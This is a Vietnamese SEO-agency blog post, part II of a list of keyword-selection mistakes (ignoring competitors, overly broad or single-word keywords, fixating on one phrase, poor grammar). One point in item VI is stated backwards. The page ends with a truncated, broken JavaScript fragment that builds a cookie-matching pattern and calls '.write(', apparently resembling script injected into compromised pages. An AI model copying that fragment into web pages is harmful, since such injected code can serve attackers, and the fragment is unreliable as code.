Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > 10 lựa chọn từ khóa ngớ ngẩn có thể lãng phí tiền của bạn (phần II)

10 lựa chọn từ khóa ngớ ngẩn có thể lãng phí tiền của bạn (phần II)

Từ khóa là một phần trọng yếu trong chiến dịch SEO website. Mọi người thường dùng những từ khóa để tìm kiếm các trang web và nếu bạn không sử dụng những từ khóa thích hợp thì website của bạn sẽ chẳng bao giờ xuất hiện. Vì thế, bạn sẽ mất đi lượng doanh thu và tiền bạc.

dịch vụ seo | từ khóa

VI. Không đánh giá đối thủ cạnh tranh.

Khi chọn từ khóa, bạn cần đưa vào để đánh giá độ canh tranh. Kiểm tra những Website đã nằm trong Top với những từ khóa đó. Bạn có cơ hội để đánh bại những đối thử cạnh tranh này hay khồng, liệu có dễ dàng để tồn tại ở vị trí top? Nếu có cách để bạn đánh bại đối thủ với những từ khóa đó, sử dụng chúng có thể làm lãng phí thời gian của bạn. Hãy thử dùng những cụm từ dài hơn với độ cạnh tranh thấp hơn mà vẫn có thể tạo ra doanh thu cho bạn (công ty SEO).

VII. Sử dụng nhiều từ khóa.

Có một số từ rất phổ biến và được dùng nhiều như “giày” tuy nhiên bạn sẽ chẳng có được nhiều lượt search vào Website.

VIII. Sử dụng những từ khóa đơn giản.

Sử dụng những từ đơn giản sẽ không mang đến những khách hàng thực sự. Thêm vào đó, với những từ này thường có độ cạnh tranh lớn, Nếu bạn bán xe hơi, sử dụng từ khóa nhứ “xe hơi”là quá rộng. Bạn cần sử dụng những cụm từ giống như đại lý Ford hay cái gì đó đại loại thế.

IX. Ám ảnh bởi một từ hay một cụm từ.

Đừng chỉ sử dụng một từ hay một cụm từ. CHọn một vài phân đoạn khách hàng mục tiêu và tìm kiếm các cụm từ liên quan mật thiết với site của bạn. Cố gắng tạo ra cân bằng giữa khách hàng mục tiêu và các traffic từ khóa.

X. Xóa bỏ những quy chuẩn ngữ pháp cho từ khóa.

Đừng bao giờ, kể cả việc có thềm nhiều từ khóa cho nội dung thì những bản coppy cũng bị lỗi. Công cụ tìm kiếm rất phong phú và việc bỏ qua những site mà không ưu tiên ngữ pháp và điều hiển nhiên.

Dịch vụ SEO – Pridio 

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘